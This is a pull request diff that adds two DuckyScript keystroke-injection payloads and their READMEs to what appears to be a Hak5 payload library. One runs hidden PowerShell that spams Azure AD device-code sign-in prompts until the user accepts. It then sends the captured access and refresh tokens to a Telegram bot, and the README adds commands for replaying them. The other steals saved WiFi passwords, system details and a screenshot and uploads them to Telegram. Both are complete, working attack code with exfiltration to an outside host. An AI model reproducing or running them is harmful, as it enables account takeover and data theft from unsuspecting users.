### PR TITLE
Add MFA Fatigue + Token Replay and Telegram Exfil payloads

### DIFF
--- a/payloads/library/credentials/MFA-Fatigue-Token-Replay/README.md
+++ b/payloads/library/credentials/MFA-Fatigue-Token-Replay/README.md
@@ -1,0 +1,98 @@
+# MFA Fatigue + Token Replay
+
+## Description
+
+When plugged into an unlocked Windows machine joined to Azure AD/Entra ID, this payload:
+
+1. **MFA Fatigue Spam** — Uses the OAuth2 device authorization grant flow to repeatedly generate Azure AD sign-in approval requests. Each iteration triggers a sign-in prompt visible on the target's Microsoft Authenticator app and registered devices. The user gets bombarded with approval requests until they accept one out of exhaustion.
+
+2. **Token Capture** — When the user finally accepts, the payload captures the full token response including `access_token`, `refresh_token`, and `id_token`.
+
+3. **Exfiltration** — All captured tokens are exfiltrated to your Telegram bot in real-time. The `refresh_token` can be replayed from any machine to generate new access tokens indefinitely (until revocation).
+
+## How It Works
+
+The device code flow (`/oauth2/v2.0/devicecode`) is designed for devices without browsers, but it has a useful side-effect: each request creates a pending authentication session that the target can approve via their Microsoft Authenticator app by entering the displayed code at `https://microsoft.com/devicelogin`.
+
+By rapidly requesting new device codes in a loop (up to `#MAX_ATTEMPTS` times), the target receives multiple sign-in prompts. The attack relies on the psychological principle of **MFA fatigue** — the user eventually approves one to stop the notification spam.
+
+## Requirements
+
+- **Hardware**: USB Rubber Ducky (or any Hak5 device running DuckyScript 3.0)
+- **Target**: Windows 10/11 machine logged into Azure AD / Entra ID
+- **Attacker**: Telegram bot to receive exfiltrated tokens
+
+## Setup
+
+### 1. Create a Telegram Bot
+
+1. Open Telegram and search for `@BotFather`
+2. Send `/newbot` and follow the prompts
+3. Copy the bot token (looks like `1234567890:ABCdefGHIjklMNOpqrsTUVwxyz`)
+4. Start a chat with your new bot and send `/start`
+5. Get your Chat ID by sending a message to `@userinfobot` or visiting `https://api.telegram.org/bot<YOUR_TOKEN>/getUpdates`
+
+### 2. Configure the Payload
+
+Edit these `DEFINE` values at the top of `payload.txt`:
+
+| DEFINE | Description | Example |
+|--------|-------------|---------|
+| `#TELEGRAM_BOT` | Your Telegram bot token | `1234567890:ABCdefGHIjklMNOpqrsTUVwxyz` |
+| `#TELEGRAM_CHAT` | Your Telegram user/chat ID | `987654321` |
+| `#TENANT` | Azure AD tenant ID or `common` | `common` or `contoso.onmicrosoft.com` |
+| `#MAX_ATTEMPTS` | Max device code iterations (fatigue level) | `50` |
+
+### 3. Compile
+
+Compile with **PayloadStudio** (https://payloadstudio.hak5.org):
+- Open `payload.txt`
+- Select your keyboard layout
+- Compile to `inject.bin`
+- Copy to your USB Rubber Ducky SD card
+
+## Token Replay
+
+Once the `refresh_token` is captured, you can replay it from any machine:
+
+```powershell
+# PowerShell - Generate new access tokens
+$body = @{
+    grant_type    = "refresh_token"
+    client_id     = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"
+    refresh_token = "<captured_refresh_token>"
+    scope         = "https://graph.microsoft.com/.default"
+}
+$tok = Invoke-RestMethod -Uri "https://login.microsoftonline.com/common/oauth2/v2.0/token" -Method Post -Body $body
+$tok.access_token  # Use this to call Graph API
+```
+
+```bash
+# cURL - Access Microsoft Graph
+curl -H "Authorization: Bearer $ACCESS_TOKEN" https://graph.microsoft.com/v1.0/me
+curl -H "Authorization: Bearer $ACCESS_TOKEN" https://graph.microsoft.com/v1.0/me/messages
+curl -H "Authorization: Bearer $ACCESS_TOKEN" https://graph.microsoft.com/v1.0/me/drive/root/children
+```
+
+## What the Attacker Receives
+
+Telegram message on acceptance:
+```
+TOKEN_CAPTURED | access_token: eyJ0eXAiOi... | refresh_token: 0.ARwA6j... | id_token: eyJ0e...
+Token claims: scope=openid profile email offline_access https://graph.microsoft.com/... token_type=Bearer expires_in=3600
+```
+
+## Notes
+
+- The `access_token` expires in ~1 hour (configurable by tenant policy)
+- The `refresh_token` is valid for ~90 days or until revoked
+- Using client_id `04b07795-8ddb-461a-bbee-02f9e1bf7b46` (Azure CLI) — a well-known public client
+- Each device code expires per the `expires_in` field (usually 900s = 15 min)
+- Polling interval is determined by the server (usually 5s)
+- Tokens can access Microsoft Graph, Outlook, SharePoint, Teams, OneDrive, and other Microsoft 365 services
+
+## Mitigation
+
+- **Number matching** in Microsoft Authenticator prevents simple fatigue (user must type a number shown on screen)
+- **Conditional Access** policies enforcing geographic or device compliance can limit token replay
+- **Token Protection** (proof-of-possession) binds tokens to specific devices

--- a/payloads/library/credentials/MFA-Fatigue-Token-Replay/payload.txt
+++ b/payloads/library/credentials/MFA-Fatigue-Token-Replay/payload.txt
@@ -20,7 +20,8 @@ DEFINE #MAX_ATTEMPTS 50
 DELAY 1000
 GUI r
 DELAY 600
-STRING powershell -W Hidden -NoP -NonI -Exec Bypass -c "
+STRINGLN_POWERSHELL
+powershell -W Hidden -NoP -NonI -Exec Bypass -c "
 $w='https://api.telegram.org/bot#TELEGRAM_BOT/sendMessage?chat_id=#TELEGRAM_CHAT&text=';
 $c='04b07795-8ddb-461a-bbee-02f9e1bf7b46';
 $t='#TENANT';
@@ -29,4 +30,4 @@ function x($s){try{Invoke-RestMethod -Uri ($w+[uri]::EscapeDataString($s)) -Meth
 x('MFA Fatigue started - '+$m+' max attempts');
 $i=0;while($i -lt $m){try{$b=@{client_id=$c;scope='openid profile email offline_access https://graph.microsoft.com/.default'};$dc=Invoke-RestMethod -Uri ('https://login.microsoftonline.com/'+$t+'/oauth2/v2.0/devicecode') -Method Post -Body $b;x('['+$i+'/'+$m+'] Code: '+$dc.user_code+' | URL: '+$dc.verification_uri+' | Exp: '+$dc.expires_in+'s');$p=@{grant_type='device_code';client_id=$c;device_code=$dc.device_code};$to=[math]::Min($dc.expires_in,180);$el=0;while($el -lt $to){Start-Sleep -Seconds $dc.interval;$el+=$dc.interval;try{$tok=Invoke-RestMethod -Uri ('https://login.microsoftonline.com/'+$t+'/oauth2/v2.0/token') -Method Post -Body $p -ErrorAction Stop;x('TOKEN_CAPTURED | access_token: '+$tok.access_token+' | refresh_token: '+$tok.refresh_token+' | id_token: '+$tok.id_token);x('Token claims: scope='+$tok.scope+' token_type='+$tok.token_type+' expires_in='+$tok.expires_in);exit}catch{}}}catch{}$i++};x('MFA Fatigue exhausted - '+$m+' attempts with no acceptance')
 "
-ENTER
+END_STRINGLN

--- a/payloads/library/credentials/MFA-Fatigue-Token-Replay/payload.txt
+++ b/payloads/library/credentials/MFA-Fatigue-Token-Replay/payload.txt
@@ -1,0 +1,32 @@
+REM Title:         MFA Fatigue + Token Replay
+REM Author:        realridhinofficia
+REM Description:   Spams Azure AD MFA push notifications via OAuth2 device code flow loop until the user fatigues and accepts. Captures the resulting access + refresh tokens and exfiltrates them via Telegram bot.
+REM Target:        Windows 10/11 with Azure AD / Entra ID
+REM Props:         Microsoft, Hak5
+REM Version:       1.0
+REM Category:      credentials
+REM Attackmodes:   HID
+
+REM CONFIGURATION
+REM REQUIRED - Your Telegram Bot Token (from @BotFather)
+DEFINE #TELEGRAM_BOT 1234567890:ABCdefGHIjklMNOpqrsTUVwxyz
+REM REQUIRED - Your Telegram Chat ID (your user ID)
+DEFINE #TELEGRAM_CHAT 987654321
+REM OPTIONAL - Azure AD Tenant ID ('common' for multi-tenant, or your tenant ID)
+DEFINE #TENANT common
+REM OPTIONAL - Max fatigue loop iterations (default 50)
+DEFINE #MAX_ATTEMPTS 50
+
+DELAY 1000
+GUI r
+DELAY 600
+STRING powershell -W Hidden -NoP -NonI -Exec Bypass -c "
+$w='https://api.telegram.org/bot#TELEGRAM_BOT/sendMessage?chat_id=#TELEGRAM_CHAT&text=';
+$c='04b07795-8ddb-461a-bbee-02f9e1bf7b46';
+$t='#TENANT';
+$m=#MAX_ATTEMPTS;
+function x($s){try{Invoke-RestMethod -Uri ($w+[uri]::EscapeDataString($s)) -Method Get}catch{}};
+x('MFA Fatigue started - '+$m+' max attempts');
+$i=0;while($i -lt $m){try{$b=@{client_id=$c;scope='openid profile email offline_access https://graph.microsoft.com/.default'};$dc=Invoke-RestMethod -Uri ('https://login.microsoftonline.com/'+$t+'/oauth2/v2.0/devicecode') -Method Post -Body $b;x('['+$i+'/'+$m+'] Code: '+$dc.user_code+' | URL: '+$dc.verification_uri+' | Exp: '+$dc.expires_in+'s');$p=@{grant_type='device_code';client_id=$c;device_code=$dc.device_code};$to=[math]::Min($dc.expires_in,180);$el=0;while($el -lt $to){Start-Sleep -Seconds $dc.interval;$el+=$dc.interval;try{$tok=Invoke-RestMethod -Uri ('https://login.microsoftonline.com/'+$t+'/oauth2/v2.0/token') -Method Post -Body $p -ErrorAction Stop;x('TOKEN_CAPTURED | access_token: '+$tok.access_token+' | refresh_token: '+$tok.refresh_token+' | id_token: '+$tok.id_token);x('Token claims: scope='+$tok.scope+' token_type='+$tok.token_type+' expires_in='+$tok.expires_in);exit}catch{}}}catch{}$i++};x('MFA Fatigue exhausted - '+$m+' attempts with no acceptance')
+"
+ENTER

--- a/payloads/library/exfiltration/Telegram-Exfil-Windows/README.md
+++ b/payloads/library/exfiltration/Telegram-Exfil-Windows/README.md
@@ -1,0 +1,58 @@
+# Telegram Exfil - WiFi, System Info & Screenshot
+
+## Description
+
+Self-contained Windows payload that exfiltrates data to your Telegram bot. No external scripts or resources needed — everything is embedded in the DuckyScript.
+
+## What It Grabs
+
+| Data | Method |
+|------|--------|
+| **WiFi passwords** | `netsh wlan show profiles` + `key=clear` |
+| **External IP** | `ifconfig.me` |
+| **User & hostname** | `$env:USERNAME@$env:COMPUTERNAME` |
+| **OS version** | WMI query |
+| **Top 10 processes** | CPU-sorted process list |
+| **Screenshot** | `Graphics.CopyFromScreen` → Telegram document |
+
+All data is sent as Telegram messages except the screenshot which is uploaded as a file.
+
+## Setup
+
+1. **Create Telegram bot** — talk to `@BotFather`, get your bot token
+2. **Get Chat ID** — message your bot, then visit `https://api.telegram.org/bot<TOKEN>/getUpdates`
+3. **Edit DEFINEs** in `payload.txt`:
+
+```
+DEFINE #BOT_TOKEN 1234567890:ABCdefGHIjklMNOpqrsTUVwxyz
+DEFINE #CHAT_ID 987654321
+```
+
+4. **Compile** with PayloadStudio, copy `inject.bin` to Ducky SD card
+
+## Example Output
+
+```
+=== EXFIL START ===
+User: jdoe@DESKTOP-ABC123 | OS: Microsoft Windows 11 Pro
+--- WiFi ---
+Office-Guest | Summer2024!
+Home-5G | passw0rd123
+Starbucks_WiFi | (no pass)
+--- IP ---
+203.0.113.42
+--- Processes Top 10 ---
+{"Name":  "chrome",  "CPU(s)":  142.5}
+{"Name":  "Teams",  "CPU(s)":  89.2}
+...
+--- Screenshot ---
+[file: exfil.jpg uploaded]
+=== EXFIL COMPLETE ===
+```
+
+## Notes
+
+- Screenshot requires STA — may fail on some Windows configurations (PowerShell MTA limitation)
+- WiFi SSIDs with special characters in name are handled correctly via quoted parameter
+- No files are left on disk after execution (temp screenshot is cleaned up)
+- All errors are silently caught — the payload won't crash mid-execution

--- a/payloads/library/exfiltration/Telegram-Exfil-Windows/payload.txt
+++ b/payloads/library/exfiltration/Telegram-Exfil-Windows/payload.txt
@@ -22,7 +22,8 @@ REM ============================================================
 DELAY #BOOT_DELAY
 GUI r
 DELAY 600
-STRING powershell -W Hidden -NoP -NonI -Exec Bypass -c "
+STRINGLN_POWERSHELL
+powershell -W Hidden -NoP -NonI -Exec Bypass -c "
 $b='#BOT_TOKEN';
 $c='#CHAT_ID';
 function tl($m){try{Invoke-RestMethod -Uri ('https://api.telegram.org/bot'+$b+'/sendMessage?chat_id='+$c+'&text='+[uri]::EscapeDataString($m))-Method Get}catch{}};
@@ -30,7 +31,7 @@ function tf($p){try{$n=Split-Path $p -Leaf;$u='https://api.telegram.org/bot'+$b+
 tl('=== EXFIL START ===');
 tl('User: '+$env:USERNAME+'@'+$env:COMPUTERNAME+' | OS: '+(Get-WmiObject Win32_OperatingSystem).Caption);
 tl('--- WiFi ---');
-netsh wlan show profiles|sls 'All User Profile'|%{$s=$_.ToString()-replace'.*:\s+','';$k=netsh wlan show profile name=`\"$s`\" key=clear|sls 'Key Content';$p=if($k){$k.ToString()-replace'.*:\s+',''}else{'(no pass)'};tl($s+' | '+$p)};
+netsh wlan show profiles|sls 'All User Profile'|%{$s=$_.ToString()-replace'.*:\s+','';$k=netsh wlan show profile name=\`"$s\`" key=clear|sls 'Key Content';$p=if($k){$k.ToString()-replace'.*:\s+',''}else{'(no pass)'};tl($s+' | '+$p)};
 tl('--- IP ---');
 tl((Invoke-RestMethod ifconfig.me -ErrorAction SilentlyContinue));
 tl('--- Processes Top 10 ---');
@@ -47,4 +48,4 @@ Remove-Item $sp;
 tl('=== EXFIL COMPLETE ===');
 Start-Sleep 1
 "
-ENTER
+END_STRINGLN

--- a/payloads/library/exfiltration/Telegram-Exfil-Windows/payload.txt
+++ b/payloads/library/exfiltration/Telegram-Exfil-Windows/payload.txt
@@ -1,0 +1,50 @@
+REM Title:         Telegram Exfil - WiFi, System Info & Files
+REM Author:        realridhinofficia
+REM Description:   Self-contained Windows exfiltration payload. Grabs WiFi passwords, system info, user data and sends everything to your Telegram bot via API. No external scripts needed — all PowerShell is embedded.
+REM Target:        Windows 10/11
+REM Props:         Hak5
+REM Version:       1.0
+REM Category:      exfiltration
+REM Attackmodes:   HID
+
+REM CONFIGURATION
+REM REQUIRED - Your Telegram Bot Token (from @BotFather)
+DEFINE #BOT_TOKEN 1234567890:ABCdefGHIjklMNOpqrsTUVwxyz
+REM REQUIRED - Your Telegram Chat ID
+DEFINE #CHAT_ID 987654321
+REM OPTIONAL - Delay before payload starts (ms)
+DEFINE #BOOT_DELAY 2000
+
+REM ============================================================
+REM Windows Telegram Exfil — WiFi + System + Browser + Screenshot
+REM ============================================================
+
+DELAY #BOOT_DELAY
+GUI r
+DELAY 600
+STRING powershell -W Hidden -NoP -NonI -Exec Bypass -c "
+$b='#BOT_TOKEN';
+$c='#CHAT_ID';
+function tl($m){try{Invoke-RestMethod -Uri ('https://api.telegram.org/bot'+$b+'/sendMessage?chat_id='+$c+'&text='+[uri]::EscapeDataString($m))-Method Get}catch{}};
+function tf($p){try{$n=Split-Path $p -Leaf;$u='https://api.telegram.org/bot'+$b+'/sendDocument?chat_id='+$c;Invoke-RestMethod -Uri $u -Method Post -Form @{document=@($p);caption=$n}}catch{}};
+tl('=== EXFIL START ===');
+tl('User: '+$env:USERNAME+'@'+$env:COMPUTERNAME+' | OS: '+(Get-WmiObject Win32_OperatingSystem).Caption);
+tl('--- WiFi ---');
+netsh wlan show profiles|sls 'All User Profile'|%{$s=$_.ToString()-replace'.*:\s+','';$k=netsh wlan show profile name=`\"$s`\" key=clear|sls 'Key Content';$p=if($k){$k.ToString()-replace'.*:\s+',''}else{'(no pass)'};tl($s+' | '+$p)};
+tl('--- IP ---');
+tl((Invoke-RestMethod ifconfig.me -ErrorAction SilentlyContinue));
+tl('--- Processes Top 10 ---');
+Get-Process|Sort CPU -Desc|Select -F 10 Name,@{N='CPU(s)';E={$_.CPU}}|ConvertTo-Json -C|%{tl($_)};
+tl('--- Screenshot ---');
+Add-Type -AssemblyName System.Drawing,System.Windows.Forms;
+$bmp=[Drawing.Bitmap]::new([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);
+$g=[Drawing.Graphics]::FromImage($bmp);
+$g.CopyFromScreen(0,0,0,0,$bmp.Size);
+$sp=$env:TEMP+'\exfil.jpg';
+$bmp.Save($sp,[Drawing.Imaging.ImageFormat]::Jpeg);
+tf($sp);
+Remove-Item $sp;
+tl('=== EXFIL COMPLETE ===');
+Start-Sleep 1
+"
+ENTER


### PR DESCRIPTION
- MFA-Fatigue-Token-Replay: Azure AD device code flow loop spams MFA push, captures tokens on acceptance, exfils via Telegram
- Telegram-Exfil-Windows: Self-contained Windows exfiltration - WiFi passwords, system info, screenshot via Telegram bot API